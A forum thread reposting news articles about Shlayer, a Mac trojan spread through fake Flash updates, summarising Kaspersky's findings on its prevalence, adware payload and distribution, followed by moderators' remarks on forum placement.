Mac users are getting bombarded by laughably unsophisticated malware

[Karlston]

Mac users are getting bombarded by laughably unsophisticated malware

For malware so trite and crude, Shlayer is surprisingly prolific.

Enlarge

Kaspersky Lab

Almost two years have passed since the appearance of Shlayer, a piece of Mac malware that gets installed by tricking targets into installing fake Adobe Flash updates. It usually does so after promising pirated videos, which are also fake. The lure may be trite and easy to spot, but Shlayer continues to be common—so much so that it’s the number one threat encountered by users of Kaspersky Labs’ antivirus programs for macOS.

 

Since Shlayer first came to light in February 2018, Kaspersky Lab researchers have collected almost 32,000 different variants and identified 143 separate domains operators have used to control infected machines. The malware accounts for 30 percent of all malicious detections generated by the Kaspersky Lab’s Mac AV products. Attacks are most common against US users, who account for 31 percent of attacks Kaspersky Lab sees. Germany, with 14 percent, and France and the UK (both with 10 percent) followed. For malware using such a crude and outdated infection method, Shlayer remains surprisingly prolific.

 

An analysis Kaspersky Lab published on Thursday says that Shlayer is “a rather ordinary piece of malware” that, except for a recent variant based on a Python script, was built on Bash commands. Under the hood, the workflow for all versions is similar: they collect IDs and system versions and, based on that information, download and execute a file. The download is then deleted to remote traces of an infection. Shlayer also uses curl with the combination of options -f0L, which Thursday’s post said “is basically the calling card of the entire family.”

 

Another banal detail about Shlayer is its previously mentioned infected method. It’s seeded in links that promise pirated versions of commercial software, episodes of TV shows, or live feeds of sports matches. Once users click, they receive a notice that they should install a Flash update. Never mind that Flash has been effectively deprecated for years and that platforms offering warez and pirated content are a known breeding ground for malware.

Second verse, same as the first

The file downloaded by the Python variant Kaspersky Lab analyzed installs adware known as Cimpli. It ostensibly offers to install applications such as Any Search, which as indicated by search results is clearly a program no one should want. Behind the scenes, it installs a malicious Safari extension and a tool that includes a self-signed TLS certificate that allows the extension to view encrypted HTTPS traffic.

 

To work around any user suspicions, Cimpli superimposes its own windows over dialog boxes that macOS provides. The left windows in the image below are what targeted users see when Cimpli is installing the Safari extension. The window to the right is what’s covered up. By clicking on the button, the user unwittingly agrees to install the extension. The HTTPS decryption tool also superimposes a fake window over the installation confirmation box. Once installed, all user traffic is redirected to an attacker-controlled proxy server.

Enlarge

Kaspersky Lab

Shlayer traditionally has relied on paid affiliates to seed advertising landing pages that display the fake Flash updates. Kaspersky Lab said Shlayer offers some of the highest rates. A newer ploy is the embedding of malicious links in pages on Wikipedia and YouTube. Kaspersky Lab said a single affiliate did so by registering more than 700 expired domains.

 

It’s hard to believe that malware this artless would be among the most common threats facing Mac users. One explanation may be that Shlayer operators must bombard Mac users over and over in a brute-force fashion to compensate for extremely low success rates. A more somber, and probably less likely, possibility: the success rate is high enough that operators keep coming back for more. In either case, it’s likely that the help of affiliates contributes to Shlayer’s ranking.

 

In any event, Shlayer’s ranking is a good reason for people to remember that Flash is an antiquated browser add-on that presents more risk than benefit for the vast majority of the world. For those who must use it, they should download updates solely from https://get.adobe.com/flashplayer/.

 

People should never receive updates from windows that are displayed when trying to view videos or install software. The distinction can be hard for less experienced users, because Flash itself presents—or at least used to present—notifications when updates were available. People also would do well to steer clear of sites offering pirated material.

 

 

Source: Mac users are getting bombarded by laughably unsophisticated malware (Ars Technica)  

[duddy]

 

Apple Macs are the target of dangerous malware called Slayer. In operation for two years now, this malware managed to contaminate 10% of computers running macOS last year. The malware affects more than 1 in 10 Mac users, reports Kaspersky.

MAC MALWARE SHLAYER INFERCTS MACOS

“The Shlayer Trojan is the most common threat on macOS,” Kaspersky Labs experts announced in a report on January 23, 2020. In 2019, the malware was available on each one in ten Macs. Users residents in France, Germany, the United States and the United Kingdom are the most affected. According to Kaspersky’s investigation.

Once installed on the victim’s computer, the malware will display dozens of advertisements on the screen. In this way, hackers quickly recover significant advertising revenue. “The macOS platform is a good source of income for cybercriminals,” warns Kaspersky. However, “the most widespread threats are linked to illicit advertising,” reassures the report. Collateral damage: your Mac’s performance can quickly deteriorate.

SHLAYER MALWARE HIDES IN FAKE FLASH UPDATES

To infiltrate the computers of iis victims, Shlayer hides in fake flash updates. These dummy updates are flooding many illegal streaming websites. To be able to watch any series or any movie in streaming, a pop-up window will regularly ask users to install the latest update to Flash Player.

Statistics show that the majority of Shlayer attacks are against users in the U.S. (31%), followed by Germany (14%), France (10%), and the UK (10%). This is wholly consistent with the terms and conditions of partner programs that deliver the malware, and with the fact that almost all sites with fake Flash Player download pages had English-language content.

Site: https://www.gizchina.com/2020/01/28/mac-shlayer-malware-infects-10-of-macos-computers/

 

[Karlston]

Similar topic merged from General News.

 

(Malware, so better here)

[duddy]

OK @Karlston bro.

Thanks for the modification so as to make it comply to the appropriate forum.

[Karlston]

21 minutes ago, duddy said:

OK @Karlston bro.

Thanks for the modification so as to make it comply to the appropriate forum.

 

You're very welcome.

 

IME, it takes a while to get used to where news posts belong, especially where there's more than one possibility. If in doubt, PM me or @Mach1  and we'll gladly point you in the right direction and explain why.

 

Also, remember to use Search before posting. There's several members posting news, so it may already be posted. That said, if you think your news item adds value to an existing topic, feel free to add a reply to that topic with your news item.

 

Finally, if you post something and realise afterwards that it or something similar is already posted, or is in the wrong News forum, or something else is not right with it, please use the "Report post" link at the top right of the post, add a brief comment and submit it. That way staff will see it quickly and deal with it.